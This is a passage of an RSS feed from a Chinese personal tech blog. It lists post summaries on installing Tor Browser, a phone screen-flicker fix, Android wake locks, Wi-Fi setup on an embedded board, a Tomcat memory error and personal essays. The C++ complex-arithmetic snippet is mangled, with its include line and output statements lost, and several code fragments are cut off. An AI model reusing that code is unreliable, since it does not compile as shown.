      <description>这几天在网上浏览的时候发现了一个厉害的浏览器——Tor浏览器&#xA;真正意义上的匿名浏览，让你在浏览任何网页的时候保护你的IP地址安全。&#xA;因为某些原因，中国本地的IP是无法通过Tor浏览器上网，因此在介绍Tor浏览器之前，我们必须要先将自己的IP地址改变，可以参考这篇博客shadowscoks科学上网&#xA;在自己的电脑可以科学上网的基础上，我们就可以来实现自己IP的隐藏技术了。&#xA;这里我的测试环境是Ubuntu15.10&#xA;第一步：&#xA;输入：&#xA;sudo add-apt-repository ppa:webupd8team/tor-browser 设置ppa&#xA;sudo apt-get update&#xA;sudo apt-get install tor-browser 通过上面简单的几步就可以将我们的Tor浏览器安装完成&#xA;第二步：&#xA;通过桌面左上角的搜索软件，搜索tor，然后打开进行浏览器配置&#xA;第一个窗口：选择configure&#xA;第二个窗口：选择yes&#xA;第三个窗口：无需选择改变，直接下一步&#xA;第四个窗口：选择yes&#xA;第五个窗口：如图设置&#xA;之后就直接选择connect，进行链接就可以了&#xA;稍微等一会儿就会自动跳入到Tor浏览器&#xA;之后，可以输入网址：ip.cn 来查看自己的ip地址，可以发现并不是自己原来的地址了</description>
    </item>
    <item>
      <title>小米手机、红米手机、小米Pad屏幕四周不停闪烁的解决办法，亲测成功！</title>
      <link>https://anwangtanmi.github.io/posts/c48b461d0d7ec171f7ccb51c05678c17/</link>
      <pubDate>Tue, 22 Dec 2015 09:39:47 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/c48b461d0d7ec171f7ccb51c05678c17/</guid>
      <description>小米手机、红米手机、小米Pad屏幕四周不停闪烁的解决办法，亲测成功！ 作为备用手机的小米突然发神经病，屏幕的左、下、右三个方向，同时出现1-2厘米宽度的条纹，不停的闪烁。&#xA;网上搜索了一下，发现这是一个普遍问题，综合各大论坛和官网上的说法，进行了实际测试，最终得以解决，虽然不知道能管多久。&#xA;分享如下：&#xA;1、关闭自动亮度&#xA;2、将亮度调到20%，这种比较暗的水平&#xA;3、将选项：系统设置 – 显示 – 休眠，调整为“从不”&#xA;4、看看开发者选项是否已经打开，如果没有打开请跳到第6步&#xA;5、将选项：系统设置-开发者选项-监控中的所有项目全部关闭，待关闭项有五个：&#xA;启用严格模式、显示CPU使用情况、GPU呈现模式分析、启用OpenGL跟踪、启用跟踪&#xA;6、关闭&#xA;7、拔电池，稍等5分钟&#xA;8、上电池，开机&#xA;9、找到原装电源线&#xA;10、点亮屏幕，此时屏幕处于永不关闭状态&#xA;11、使用电源线通过USB口将手机接到电脑上&#xA;12、此时手机处于充电状态&#xA;13、保持该状态2小时以上，连续3天，每天都做一次&#xA;14、第一天就能看到闪烁减弱&#xA;个例实验，仅供参考，如有更好建议，请回复与大家分享。</description>
    </item>
    <item>
      <title>算法提高 6-17复数四则运算 蓝桥杯</title>
      <link>https://anwangtanmi.github.io/posts/a7894fa1491d16bc9543b16598ad6f13/</link>
      <pubDate>Fri, 06 Feb 2015 23:01:33 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/a7894fa1491d16bc9543b16598ad6f13/</guid>
      <description> 不知道蓝桥杯平台又搞什么鬼，复制出来的效果像是一坨shit，只能截图了，回归正题，复述四则运算是我们在高中学习的内容，相信在大家刚接触编程语言的时候都做过类似的题目，这种题目本身不难，关键是要满足题目中的条件，而这种细节性的东西又不容易被掌握，乍看题目，描述简简单单，实际暗藏杀机，最关键的一个就是数据类型，给出的例子全都是整型，题目中也没有说是什么数据类型，于是我就习惯性的用了int，当然是华丽的错误，需要使用double，估计是有小数，然后就是加号的处理，因为虚部如果是负数就直接输出带着负号就行，但是正数就需要输出正号，我是通过条件语句处理，记得以前学iomanip的时候有一个强制输出符号的，大家有兴趣可以试试 上代码 #include using namespace std; void add(double a,double b,double c,double d) { cout&amp;lt;=0) cout&amp;lt;&amp;lt;&#34;+&#34;; cout&amp;lt;=0) cout&amp;lt;&amp;lt;&#34;+&#34;; cout&amp;lt;=0) cout&amp;lt;&amp;lt;&#34;+&#34;; cout&amp;lt;=0) cout&amp;lt;&amp;lt;&#34;+&#34;; cout&amp;lt;&amp;lt;(b*c-a*d)/(c*c+d*d); cout&amp;lt;&amp;lt;&#39;i&#39;&amp;lt;&amp;gt;a&amp;gt;&amp;gt;b&amp;gt;&amp;gt;op&amp;gt;&amp;gt;c&amp;gt;&amp;gt;d; if(op==&#39;+&#39;) add(a,b,c,d); if(op==&#39;-&#39;) sub(a,b,c,d); if(op==&#39;*&#39;) mul(a,b,c,d); if(op==&#39;/&#39;) div(a,b,c,d); return 0; } </description>
    </item>
    <item>
      <title>悠悠的相思</title>
      <link>https://anwangtanmi.github.io/posts/2f338579844f2228e432f97b536a5d71/</link>
      <pubDate>Fri, 25 Jul 2014 18:17:48 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/2f338579844f2228e432f97b536a5d71/</guid>
      <description>丝丝缕缕的思念，已经编织成一张密密的网，拌住了我的脚步，却放飞了心中的思绪。&#xA;低头闭目我想你，泪如雨飞，暗湿了我的衣襟，也浸湿了那帧熟悉的照片，滴中了你的唇边，远方的你可曾偿到这泪珠的味儿…….&#xA;永远不会忘记，那个曾经的微笑，它是我心中的骄阳，夜里的浩月，心中即使是乌云密布，只要见到它，就能雨过天晴。&#xA;如今那可爱的笑容，充满爱意的眼神，已在风中失去，我再也无法感觉到它的暖意。&#xA;春意正浓，万物苏醒，可我的心里还是隆冬腊月，眼前却是雪花飞舞，可怜的我不知道哪里才是自己的避风港……</description>
    </item>
    <item>
      <title>推荐《这就是搜索引擎：核心技术详解》一书</title>
      <link>https://anwangtanmi.github.io/posts/07411f3208b0c152b2ab36067bdfcc7c/</link>
      <pubDate>Thu, 13 Feb 2014 15:08:57 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/07411f3208b0c152b2ab36067bdfcc7c/</guid>
      <description>比较务实的一本书，也是我2014年推荐的第一本书《这就是搜索引擎：核心技术详解》，这本书陆陆续续看了大半年，受益匪浅。虽说是核心技术详解，实际上这并不是给专业人员看的书，站长朋友看了后会对搜索引擎多了一份理性，少一分谩骂。本书看起来很轻松。&#xA;全书通俗易懂，内容广而不深，对搜索引擎的技术做了很全面的介绍，包括搜索引擎整体框架、爬虫、抓取策略、暗网爬取、分布式爬虫等内容。&#xA;搜索引擎作为互联网用户的上网入口，对流量的引导与分流至关重要，甚至可以说起了决定性的作用。1991年，Tim Berners-Lee将超文本的概念引入互联网，同时推出了WWW雏形、配套的HTTP传输协议及相应的Web服务器技术。1993年，第一个图形浏览器mosaic诞生，网页浏览客户端趋于成熟，这些技术与产品为互联网的快速普及和发展做好了技术准备，互联网用户开始从最初的军队和高校等科研机构普及到普通的个人用户，为接下来互联网的商业化大规模发展奠定了基础。&#xA;互联网信息量在过去15年获得了爆炸性增长，信息过载的问题目前来说非常严重，随着互联网个性化的发展趋势逐步展现，普通用户发布信息的成本越来越低，这个问题将会更加严重。这是搜索引擎相关引用越来越重要的一个基础背景。搜索是目前解决信息过载的相对有效的方式，在没有有效的替代解决方式出来之前，搜索引擎作为互联网网站和应用的入口及处于行业制高点的重要地位只会逐步加强。&#xA;搜索引擎发展史：分类目录(网址导航)是史前时代、文本检索是第一代、链接分析是第二代、以用户中心是第三代，&#xA;搜索引擎的3个目标：更全、更快、更准。&#xA;搜索引擎的3个核心问题：1.用户真正的需求是什么，2.哪些信息是和用户需求是真正相关的，3.哪些信息是用户可以信赖的。&#xA;搜索引擎的架构，一张图可以说明情况：&#xA;除了上述的子功能模块，“反作弊”模块也日益重要。&#xA;互联网页面划分为五个部分：1.已下载网页集合、2.已过期网页集合、3.待下载网页集合、4.可知网页集合、5.不可知网页集合。&#xA;网络爬虫分为：批量性爬虫、增量型爬虫、垂直型爬虫。&#xA;爬虫抓取的策略：1.宽度优先遍历、2.非完全PageRank、3.OPIC(Online Page Importantance Computation)、4.大站优先。&#xA;网页更新策略：1.历史参考策略、2.用户体验策略、3.聚类抽样策略。&#xA;写在最后：&#xA;结合上面的信息我们就能大致明白了：爬虫分很多种，爬虫来了不一定抓取的原因就是这里。另外爬虫是否抓取(重新抓取)你的网页也有很多种参考因素，我们通常所以的保证网站持续更新就是历史参考策略了。本文我把网页和爬虫的部分都罗列了出来，有兴趣的朋友可以买书来看。&#xA;很多时候，你问的答案就在这里，如果你不细读的话!&#xA;书名：《这就是搜索引擎:核心技术详解》&#xA;作者：张俊林&#xA;出版社：电子工业出版社&#xA;出版日期: 2012年1月1日&#xA;平装: 300页&#xA;原链接来自百度</description>
    </item>
    <item>
      <title>关于自控的培养</title>
      <link>https://anwangtanmi.github.io/posts/e360c5519c1d00a18a647d5e1c2e500f/</link>
      <pubDate>Mon, 27 Jan 2014 11:20:34 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/e360c5519c1d00a18a647d5e1c2e500f/</guid>
      <description>最近看了两本书《自控力》和《暗时间》，这两本都没还看完，目前都是各看了一半。本来是想看完了再写个读后感，但是启发和感觉并不是以书的本数为单位的，感觉到了就先记录下来。&#xA;前者是关于学习如何自控的书，基调是人人都可以自控，后者是一些思考（学习）方法的反思和总结。以下是我看这两本书期间的一些思考过程，重点是建设更好的自己。&#xA;现在网络如此发达的年头，如果你经常上网的话，不用去特地找一些至理名言，那些深受大家赞同的或者说比较重要的观点啊、人生态度啊有一天自然会浮现在你的眼前。比如说晚上八点钟之后做的事情的重要性啊还有人生各阶段的心理状态啊都已经看到过几次了，也是比较赞同的。&#xA;但是关于自控力的重要性，我只在某个论坛的角落里看到过一次的这一句话：“人是靠自控力生存的生物”。虽然之前我也知道自己总是拖拉不自控，但是没想到自控是有这么重要，突然间我明白了限制自己发展的瓶颈不在于智商，更重要的是自控。智商不是硬伤啊，自控才是啊！药，药。&#xA;也许大家都已经默认这个观点，也许大家也没注意到其重要性，所以到最近我才真正思考提升自控。我还是写出一些基本观点，因为我觉得分享成就你我啊。&#xA;那么自控的能量从何而来，自控的信号由大脑的前额皮质发出。前额皮质是人类最新进化出的一个区域，它掌管理智控制自己的部分（理智的自己），但是由于进化是循序渐进的，人类也保留了大脑中原始本能的那一区域（原始本能的自己）。&#xA;在远古时代，原始本能曾经救了人类很多次，也得以让人类的基因继续延续。经过了几百万年人类进化出了勉强可以用的前额皮质。但是人类进入农业文明才几千年，进入工业社会才几百年，进入信息化的今天才几十年不到，相较于几百万年的进化，这时间实在是太短了，也就是说进化已经跟不上人类发展的节奏了。有时候是一种无法抑制的本能，比如说明明知道老虎锁在笼子里，但是如果它对你怒吼，你还是会起寒毛的。&#xA;很多情况下，原始的自己和理智的自己是冲突的。一个广为流传段子：“小学的时候心里总是有两个小人在打架，难舍难分，中学的时候邪恶的小人赢了，大学的时候已经感觉不到小人在打架了，正义的小人已经被打死了”。这就是一个自我博弈的过程。具体分析一下，小时候家长增加了一部分让你理智的能量，而到中学或者大学的时候这种监管逐渐变少，原始部分马上暂居上风，尤其是在你没有人生目标的时候，人生陷入了第一次迷茫，就像程序跑飞了一样，只有对于挂科的恐惧推动你向前进（恐惧信号也是由原始部分发出的）。原始的自己为什么这么做，为什么总是让你去享受当下，因为在远古时代能量是非常宝贵的资源，所以当前能摄入多少就摄入多少，能爽一时就爽一时，只要没有什么能威胁到自己的东西，我才不会浪费自己的能量在那些可能都没有结果或者成效的事情上去呢，万一明天就有野兽什么突然袭击呢，还是先存储能量好啊。&#xA;我们要做的是，让原始的自己和理智的自己协同合作，并且逐渐增强自控力。&#xA;如何增强自己自控力。自控力实际上就像是肌肉，如果你经常自控的话，那么肌肉会越来越强壮，如果你老是不用的话，自然就会萎靡。自控力也犹如锻炼肌肉一样，如果你老是不锻炼，突然来一下很猛的一套锻炼，那么肌肉可能会拉伤，反而起不到锻炼的效果。也犹如锻炼肌肉，锻炼之后要休息，休息之后才能更好的使用或者锻炼。但是别忘了自控力或者说理智的锻炼并不能带来身体的活力，如果身体状态好的话，也就是精力旺盛的话自控会更有效果。&#xA;以上是基本原理。那么到底如何锻炼。&#xA;举个例子。以前的我有时候在发呆以及搞东搞西啥都没搞的一上午之后，我为自己的浪费感到淡淡的忧伤，于是怒设定一目标，下午专注看书四个小时！结果是我在勉勉强强看了一个小时不到之后又开始想这想那，之后三个小时看起来在做事，实际上注意力没集中，效果较差，甚至一直在等这三个小时的结束。这种目标的设定只是给自己的心理安慰而已，并没有积极的效果。实际上甚至设定一个小时的看书时间这样的目标可能效果也比以上要好。所以首先不要欺骗自己，看清自己，设定一个自己能较好达成的目标，然后再循序渐进的完成它，不然的话，就像戒了一段时间烟的人之后反而会抽得更猛。&#xA;所以要设定一些小而多的目标，即使是锻炼也是分几组几组练的呀。实际上生活中存在的选择比我们要想象得多的多，要学会监视和反思自己的行为，在一些小选择上思考应该或者不应该，而在条件允许下，首先设定一些不难的目标，再循序渐进。很多时候胜负早就已经在你慢慢地失控下决出。比如你可能每天都要逛淘宝都想买东西并且很多时候买完都想剁手甚至觉得自己是蜈蚣就好了，其实最终目标是，你不想剁手（现实中存在有赌博犯在真的剁掉小拇指之后还是继续赌博的案例的），但是你的自控力已经在漫无目的地逛淘宝时已经慢慢地失去了，但是不让你逛淘宝是不可能的，所以先设个简单的目标，比如一个星期某一天不逛淘宝开始。&#xA;书中提到最好的锻炼自控的方法就是每天坚持跑步。这样即能锻炼身体，而本身坚持就是锻炼自控的一种方式。&#xA;锻炼之后如何休息。&#xA;书中提到一种冥想的状态，就是什么都不想什么都不听什么都不看静静的休息几分钟之后自控的力量会恢复一些。还有就是保证充足的睡眠，如果处于缺眠状态那么会更容易失控。&#xA;以上方法核心在于，切割易化任务，给自己找成就感，不要过多的责怪自己，因为很多时候失控是因为你没有意识到那些让你失控的原因。&#xA;如何让原始的自己和理智协同合作。&#xA;这要利用大脑原始部分的特性，恐惧、欲望、开心、失落这些都是原始部分的管辖范围。而前额皮质只是做理智分析而已（并没有情绪，我理解是这样，说错勿怪）。学霸为什么就喜欢做题就喜欢看书学习，难道他们天生自控力特别强吗，这可不一定，这也可能是他们一做题一学习就会“开心”，为什么会开心呢，因为他们想想自己做这些题目就能拿第一了那怎么能不开心。&#xA;那么让理智和原始的协作就是要靠情绪渲染了，比如说想象自己这么干以后就会有女神了，或者不这么干就要活撸辈了，再或者经历了一次惨痛的失恋（可能会有副作用），都能一定程度上激发出自己的能动性。关键在于并不是每次我们都能想到这些，甚至想到那么远，或者切身感受到那么遥远的以后的自己会是多么开心或者失落，所以我们需要强化“我想要”以及“我不要”的主观感受，强化的意思就是多次去思考这个问题然后激发出情绪。&#xA;额，写了有一些了，先到这，也不知道有没人看。&#xA;2014年，祝大家变得更好。</description>
    </item>
    <item>
      <title>如何让手机保持唤醒状态</title>
      <link>https://anwangtanmi.github.io/posts/46526a7f7ff0afde81341812c1d26f46/</link>
      <pubDate>Sun, 08 Dec 2013 11:35:04 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/46526a7f7ff0afde81341812c1d26f46/</guid>
      <description>手机的正常行为是闲置一段时间后屏幕变暗，然后熄灭，然后CPU关闭。&#xA;有些场景需要改变这种行为，例如播放视频时希望屏幕不要熄灭；&#xA;正在进行一些后台操作比如下载东西的时候希望CPU不要停止；&#xA;保持屏幕点亮：&#xA;在activity中执行如下code（不要在service或者其他组件调用）&#xA;getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);&#xA;这种做法不需要权限，一般你也无需clean这个flag，系统会管理一切。&#xA;或者在activity的layout中设置属性，这和上面的方法是一样的。&#xA;android:layout_width=”match_parent”&#xA;android:layout_height=”match_parent”&#xA;android:keepScreenOn=”true”&amp;gt;&#xA;…&#xA;保持CPU打开&#xA;需要通过PowerManager拿到wake locks，这种方式一般不用再activity中，一般用在后台service中，用于在屏幕熄灭的时候让CPU继续开启。&#xA;首先需要声明权限&#xA;申请&#xA;PowerManager powerManager = (PowerManager) getSystemService(POWER_SERVICE);&#xA;Wakelock wakeLock = powerManager.newWakeLock(PowerManager.PARTIAL_WAKE_LOCK,&#xA;“MyWakelockTag”);&#xA;wakeLock.acquire();&#xA;释放&#xA;wakeLock.release();&#xA;如果用法是你的broadcast receiver中启动一个service，这个service需要保持CPU开启，那么可以使用WakefulBroadcastReceiver。&#xA;WakefulBroadcastReceiver会创建和管理一个PARTIAL_WAKE_LOCK，它保证启动的service执行期间CPU是开启的。&#xA;(这儿提到了PARTIAL_WAKE_LOCK，一共有4种lock。）&#xA;Value CPU Screen Keyboard PARTIAL_WAKE_LOCK On Off Off SCREEN_DIM_WAKE_LOCK On Dim Off SCREEN_BRIGHT_WAKE_LOCK On Bright Off FULL_WAKE_LOCK Ob Bright Bright public class MyWakefulReceiver extends WakefulBroadcastReceiver {&#xA;@Override&#xA;public void onReceive(Context context, Intent intent) {&#xA;// Start the service, keeping the device awake while the service is</description>
    </item>
    <item>
      <title>终于迈出这一步</title>
      <link>https://anwangtanmi.github.io/posts/eace6c59a4cefd8a8b6f3a5b4672453d/</link>
      <pubDate>Fri, 15 Nov 2013 23:01:40 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/eace6c59a4cefd8a8b6f3a5b4672453d/</guid>
      <description>从大一刚入学进到桑梓到现在已经十三个月了，却连个记录自己学习路线、经验、感受的空间都没有。很多资料简单的收藏下载之后就压在箱底不再去看，&#xA;虽然之前遇到问题上网求解的时候也看了很多大牛的博客，也萌生过自己开一个的想法，但拖延症作祟，即使只是几个简单的步骤，也拖到了今天才开通。&#xA;而没有拖得更久的原因是——嗯，每次暗下决心其实都是这个原因——受了刺激。&#xA;先是看到从牛顿撞钟开始关注的碎总的imid.me越来越强大，早已不是当年简陋的模样，Nexus5、RMBP、ADT、录音室的图片罗列起来隐约透着大牛的味道。碎总现在也已经是小米的小骨干了，业余时间完成的Fuubo也是倍受好评。&#xA;而我也过了蛋碎君做牛顿撞钟时的年纪，却还是学啥啥不成，Linux还一知半解呢，又开始折腾ObjC，其实都没怎么上心，甚至连C++都快要丢掉了，当初预想的Android连头都没开，一腔热血下好的ADT也搬出硬盘。明年就要大三了，估计要开始负责桑梓运维的事情，可看看自己现在的水平，实在是无颜见学长学姐学弟学妹。&#xA;昨晚又看到Hebe的CSDN博客已经攒了不少内容。想想大一的时候，其实编程水平跟蚊香君差不了多少，眼界也要开阔不少，可是眼高手低又不敢做事的挫逼性格搞得自己越来越Low，不敢做也就懒得去练，不鸣则已一鸣惊人只是幻想，从未认真过。ACM连半途都没有就废掉了，而Hebe现在已经能去参加区域赛了。&#xA;What The Fuck Am I Doing！！！&#xA;两个刺激都跟博客有关，所以就从开自己的技术博客开始吧。规划路线很简单，难的是走好，终于迈出了第一步，以后的每一步都会认真的记录下来，为了这一点也要坚持下去，毕竟这玩意儿大家都看着呢，嘿。&#xA;高数前的这几周忙过之后就开始着手搭建自己的博客了，听碎总的话从Wordpress开始学起，敢起飞才不会永远是菜鸟。&#xA;嗯，先这样吧，晚安。</description>
    </item>
    <item>
      <title>Xshell 配色方案[Solarized Dark 修改版]</title>
      <link>https://anwangtanmi.github.io/posts/d5197a9db15c886730d9e3eaf6b9361d/</link>
      <pubDate>Fri, 15 Nov 2013 12:02:32 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/d5197a9db15c886730d9e3eaf6b9361d/</guid>
      <description>习惯了 SSH Shell 黑色的配色，Xshell 自带的 ANSI Colors on Black 其实也挺好的，就是蓝色不行，粗体的蓝色就更矬了，在黑色的背景里很难分辩（分显示器），所以就在网了找了个叫做 Solarized Dark 的配色方案，又根据自己的需求在原来的基础上做了些修改，加强了 text 和 text(bold) 的亮度。&#xA;Solarized Dark.xcs&#xA;下载上面的文件，使用 Xshell 的配色方案管理功能导入就行了。&#xA;以下是配色方案的详情：&#xA;[Names] count=1 name0=Solarized Dark [Solarized Dark] text(bold)=b0b0b0 magenta(bold)=6c71c4 text=d0d0d0 white(bold)=fdf6e3 green=859900 red(bold)=cb4b16 green(bold)=586e75 black(bold)=073642 red=dc322f blue=268bd2 black=002b36 blue(bold)=268bd2 yellow(bold)=657b83 cyan(bold)=93a1a1 yellow=b58900 magenta=dd3682 background=000000 white=eee8d5 cyan=2aa198</description>
    </item>
    <item>
      <title>互联网信息性问题</title>
      <link>https://anwangtanmi.github.io/posts/d7785d1d88d516ab32d9245dc288c3dd/</link>
      <pubDate>Tue, 23 Apr 2013 13:16:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/d7785d1d88d516ab32d9245dc288c3dd/</guid>
      <description> 互联网信息性问题&#xA;【摘要】：针对Web信息可信度问题,提出了一种为Deep Web数据记录计算可信度的有效方法C-Rank。该方法为每一条记录构造一个S-R可信度网络,包含两种类型顶点及三种类型边。首先基于可信度传播的思想,利用顶点出度为每一个顶点计算其局部可信度值;再利用Record顶点入度及相邻Site顶点的可信度值,为该Record顶点计算权值;继而求得整个S-R网络的全局可信度值。实验证明,C-Rank方法能够合理而有效地评价数据记录的可信度,从而达到甄别虚假信息,为用户推荐可信数据记录的目的。该方法普遍适用于Deep Web的各个领域。&#xA;【作者单位】： 中国人民大学信息学院&#xA;【关键词】： 深层网络 Web信息可信度 S-R可信度网络 可信度传播 </description>
    </item>
    <item>
      <title>YUV422转BGR888（海思3516平台）</title>
      <link>https://anwangtanmi.github.io/posts/3bb21b9141514cdbf080b538b9bfe0c3/</link>
      <pubDate>Fri, 15 Mar 2013 09:14:55 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/3bb21b9141514cdbf080b538b9bfe0c3/</guid>
      <description>#include &#34;hi_comm_ive.h&#34; #include &#34;mpi_ive.h&#34; #pragma pack(1) typedef struct{ short type; int size; short reserved1; short reserved2; int offset; } BMPHeader; typedef struct{ int size; int width; int height; short planes; short bitsPerPixel; unsigned compression; unsigned imageSize; int xPelsPerMeter; int yPelsPerMeter; int clrUsed; int clrImportant; } BMPInfoHeader; #pragma pack() int saveBMPFile(unsigned char* src, int width, int height, const char* name){ BMPHeader hdr; BMPInfoHeader infoHdr; int ret = 0; FILE* fp = NULL; if(NULL == src) { return (-1); } fp = fopen(name,&#34;</description>
    </item>
    <item>
      <title>在tiny6410 上使用USB无线网卡 –W311M</title>
      <link>https://anwangtanmi.github.io/posts/d0613e405c4c5b8acc1039cc3e0bbd8e/</link>
      <pubDate>Thu, 27 Dec 2012 16:45:22 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/d0613e405c4c5b8acc1039cc3e0bbd8e/</guid>
      <description>1.移植wpa_supplicant ,上一篇当中已经说明了。&#xA;2.加载网卡驱动&#xA;我写了一个脚本：W311m.sh&#xA;#!/bin/sh&#xA;modprobe rt2800usb&#xA;echo 148F 5370 &amp;gt; /sys/bus/usb/drivers/rt2800usb/new_id 3.创建连接暗文密码&#xA;wpa_passphrase 路由器名 密码 &amp;gt; /etc/wpa_supplicant.conf&#xA;4.后台运行wpa_supplicant&#xA;wpa_supplicant -Dwext -iwlan0 -C/var/run/wpa_supplicant -c/etc/wpa_supplicant.conf &amp;amp;&#xA;要一直等待，直到出现：&#xA;Trying to associate with 94:44:52:b1:8b:83 (SSID=’yateksrd’ freq=2412 MHz) Associated with 94:44:52:b1:8b:83 WPA: Key negotiation completed with 94:44:52:b1:8b:83 [PTK=CCMP GTK=CCMP] CTRL-EVENT-CONNECTED – Connection to 94:44:52:b1:8b:83 completed (auth) [id=0 i]&#xA;5.自动配置IP地址&#xA;udhcpc -i wlan0&#xA;也要一直等待，直到出现：&#xA;Sending discover… Sending select for 192.168.1.24… Lease of 192.168.1.24 obtained, lease time 49979008 deleting routers route: SIOCDELRT: No such process adding dns 192.</description>
    </item>
    <item>
      <title>开始</title>
      <link>https://anwangtanmi.github.io/posts/a3e3b88377c8a2f34e0f9ef6e67dbe62/</link>
      <pubDate>Sun, 02 Sep 2012 07:48:41 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/a3e3b88377c8a2f34e0f9ef6e67dbe62/</guid>
      <description>每个人都想要别人倾听自己的心声。社交网络发达的今天，各种个人主页上刷屏一样的状态不断地证明这样话。&#xA;在之前的相当长一段时间里，我一直依靠腾讯说说，人人状态，向外界传达自己的心声。个人感觉，这种方式过于浮躁，但符合这个快餐文化的时代。&#xA;常常觉得需要系统整理自己的思路，说说之类的微博流却难以做到的。&#xA;前几天，读到了刘未鹏的《暗时间》，里面关于写博客的讨论论断，鼓励我最终做出了写博客的决定。&#xA;身处这个快节奏的社会，我们做很多事情都变得过于急躁。学习，工作，娱乐，聚会。。。。。。几乎所有的社会活动里都被提速了。我们来不及&#xA;思考，也来不及反省。对于人类本身来说，很多次大的突破，源于某些个体在反思自身过程中的顿悟。如果一个人，没有了思考，那么他终将停滞不前。&#xA;写博客一个很重要的好处就是：它可以帮助你停下来思考过往的生活，系统地整理自己思路。好比日记，不过对于我这个写字好难看的人来说，日&#xA;记还是算了吧。&#xA;以上是我现在选择开始写博客的原因。与大家分享，希望更多的人找到符合自己的提高的方式。</description>
    </item>
    <item>
      <title>初篇—我的第一篇博客</title>
      <link>https://anwangtanmi.github.io/posts/fad55e02cc0d7d70db5713a3197d37e4/</link>
      <pubDate>Wed, 09 May 2012 22:15:05 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/fad55e02cc0d7d70db5713a3197d37e4/</guid>
      <description>RT。&#xA;多年没有认真的，较真的写过类似于日记相关的东西了，&#xA;平时在记事本中的各种记录都是用了就删了，回首来处，暗尘飞，无痕迹。&#xA;于是想起，在网络的某个角落保存属于自己的记忆。&#xA;毕业至今，工作以近四年，压力和乐趣并存。&#xA;扪心自问，成长的速度却还是不甚理想。&#xA;依稀记着新毕业，第一份工作的时候，人事主管问我的职业规划，&#xA;我坚定的选择了做一个纯粹的技术型人员。然而，我终于还是没能走上这条路。&#xA;仔细想想，当初在JC的生活简单而又充实，各方面的成长自己都能感受的到。&#xA;11年上旬，工作的将满第三个年头吧。我开始带着同事一起开发了。&#xA;从性能改善开始，那个时候那么纯粹的，那么明确的想做好一件事。&#xA;奋战了几个礼拜，终于完成，虽然好多东西没有达到自己最初始的期望，&#xA;但是，毫无疑问，在限定的工期和作业条件下，同事和我都尽了最大的努力。&#xA;至今，带项目组已近一年有余，感受却是慢慢的在变化了。&#xA;从最开始的，设计+管理慢慢的演变到了管理+疑问解答，角色和所做的工作都在&#xA;变化，心境也是自然不同的。&#xA;这种变化很难描述，但是却是充满着矛盾的，&#xA;我尝试着引导大家尽可能的完成的尽善尽美，但是并非每个人都能够理解这种做法。&#xA;家境和经历的不同，让大家对于工作的态度也不尽相同。为了平衡这种不同。&#xA;我花费了巨大的精力。&#xA;虽然现在项目组发展的比较平稳，但是始终觉着，一个项目组想要平稳高效&#xA;的前进，需要完善的制度，和相当的执行力，监督能力，奖惩措施。&#xA;只靠个人魅力，领导力的团队，时长了，必然会有各种各样的矛盾。&#xA;最近确实很辛苦，休息了9天了….&#xA;明天需要干劲十足。 fighting！！！&#xA;呃，开通博客三天内不允许发表文章。。。先写着吧，日后发表，就这样，</description>
    </item>
    <item>
      <title>PermGen space错误解决方法</title>
      <link>https://anwangtanmi.github.io/posts/5b4f76ed251614a7fb75bb84fb0cc5fa/</link>
      <pubDate>Mon, 21 Nov 2011 16:17:29 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/5b4f76ed251614a7fb75bb84fb0cc5fa/</guid>
      <description>1.参考： http://blog.csdn.net/fox009/article/details/5633007&#xA;http://hi.baidu.com/like_dark/blog/item/19c1948b3292b0799f2fb468.html&#xA;http://anyeeye.iteye.com/blog/444624&#xA;Tomcat6性能调优 出现java.lang.OutOfMemoryError: PermGen space&#xA;http://www.mkyong.com/tomcat/tomcat-javalangoutofmemoryerror-permgen-space/&#xA;2.报错： Exception in thread &#34;DispatcherThread&#34; java.lang.OutOfMemoryError: PermGen space Exception in thread &#34;ContainerBackgroundProcessor[StandardEngine[Catalina]]&#34; java.lang.OutOfMemoryError: PermGen space Exception in thread &#34;State Saver&#34; java.lang.OutOfMemoryError: PermGen space Exception in thread &#34;AWT-Windows&#34; java.lang.OutOfMemoryError: OutOfMemoryError 3.原因： PermGen space的全称是Permanent Generation space,是指内存的永久保存区域,&#xA;这块内存主要是被JVM存放Class和Meta信息的,Class在被Loader时就会被放到PermGen space中,&#xA;它和存放类实例(Instance)的Heap区域不同,GC(Garbage Collection)不会在主程序运行期对&#xA;PermGen space进行清理，所以如果你的应用中有很多CLASS的话,就很可能出现PermGen space错误,&#xA;这种错误常见在web服务器对JSP进行pre compile的时候。如果你的WEB APP下都用了大量的第三方jar, 其大小&#xA;超过了jvm默认的大小(4M)那么就会产生此错误信息了。&#xA;4.解决方法1： 手动设置MaxPermSize大小，如果是linux系统，修改TOMCAT_HOME/bin/catalina.sh，如果是windows系统，修改TOMCAT_HOME/bin/catalina.bat，&#xA;在“echo “Using CATALINA_BASE: $CATALINA_BASE””上面加入以下行：&#xA;JAVA_OPTS=”-server -XX:PermSize=64M -XX:MaxPermSize=128m&#xA;建议：将相同的第三方jar文件移置到tomcat/shared/lib目录下，这样可以达到减少jar 文档重复占用内存的目的。&#xA;5.解决方法2 修改eclipse.ini文件，修改如下：&#xA;-vmargs -Dosgi.</description>
    </item>
    <item>
      <title>2011-08-09</title>
      <link>https://anwangtanmi.github.io/posts/d7a9e1dfc11849db0f8ae23e1daaf243/</link>
      <pubDate>Tue, 09 Aug 2011 23:20:05 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/d7a9e1dfc11849db0f8ae23e1daaf243/</guid>
